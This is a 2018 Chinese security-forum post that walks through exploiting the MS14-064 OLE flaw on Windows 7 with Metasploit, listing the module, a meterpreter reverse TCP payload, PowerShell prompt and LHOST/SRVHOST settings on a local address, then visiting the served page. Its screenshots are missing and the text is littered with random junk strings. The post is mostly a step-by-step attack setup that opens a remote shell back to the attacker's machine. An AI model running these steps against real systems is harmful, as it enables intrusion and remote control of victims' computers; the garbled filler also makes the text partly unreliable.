找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2031|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1 r2 @3 U/ p1 I) h 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 * O2 [; V3 C/ b0 A$ H m

2 x4 F9 i T3 ^1 j ~$ i$ w

' Q" w0 J8 n2 R 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: + }4 U- y" G" u2 z7 g

: q. r; O1 x; c+ z2 b% P

. V3 ?7 T+ |7 [7 K2 c, l" F! C 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp- L9 e5 e! `' P

. l+ @6 s" H4 d

, B2 k$ Q$ h+ X1 S" I- \# t5 k+ p             set AllowPowershellPrompt true! T4 K) o+ z9 S- t6 {

0 o' l1 h) [9 t9 |0 z4 m

1 T1 a/ I, b! l8 {. a             Set LHOST 192.168.0.109 H; X0 X- n% I- B

8 |/ t& a" C" u3 B9 c) d- E& `. @

* x* G5 S- q1 O             set SRVHOST 192.168.0.109 6 o. W, R8 ?* ^

C* Q H1 f, ~

: w) i' r7 q2 Q {$ P1 \" w% S3 c             Set uripath share( G- P( g0 U! ]3 n7 e

) C; h8 U2 e' z: o7 f9 }' q

5 i5 y' s# y T* j2 D/ ]/ e) k' H$ p             Set srvport 80% Y+ \9 I7 V9 D, n3 q7 `' G2 _

$ x) x& h5 X! |7 l: R/ B5 G

6 D* U% P, o0 G: v9 G7 G  ' o) x8 }9 ~, H8 }

" w1 l) [& b+ N$ ?, T

% ] o4 o) s- F' L+ x7 w( J   * G, T b( K3 _

2 e+ f2 L U" z- I

2 X4 d2 {3 i# w4 q& w   |3 ?. H; h; _) S6 x" k" O9 N

0 ~/ M f+ y0 C* l' _- Z/ Q

- t4 ]! L B- \7 x/ p5 F, Z   1 I* ]; M4 {+ o& [9 Q; J

5 C, o2 f; o" [7 O4 }3 o

* o- V- ?0 N4 g% P/ ~; |5 j. f$ {  1 X7 ^6 S: _* V7 E2 _4 G. Y" c4 U

# U- E8 i0 \- H# _2 y: G

7 H# d4 Y5 S7 x& k0 d% k: m 下面我们来访问本地地址如图: 9 F! m# d' M% Y" [8 C2 R% x" \

9 k$ G, A- A( r9 x. F. G; Z8 { L

4 C0 k, m/ h6 ]9 L4 u   8 n& i- l2 a3 R- F

: X' ~' ~* c$ L

3 U' J: F) \# H/ J   . l1 v0 f/ i! \3 o ~& `! M) \ `

: t L/ n3 t) i7 l& g8 Y8 r

7 [% V- }9 V/ A W- d+ L) H0 c 2 X" V; s G5 ?# `3 j- I

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表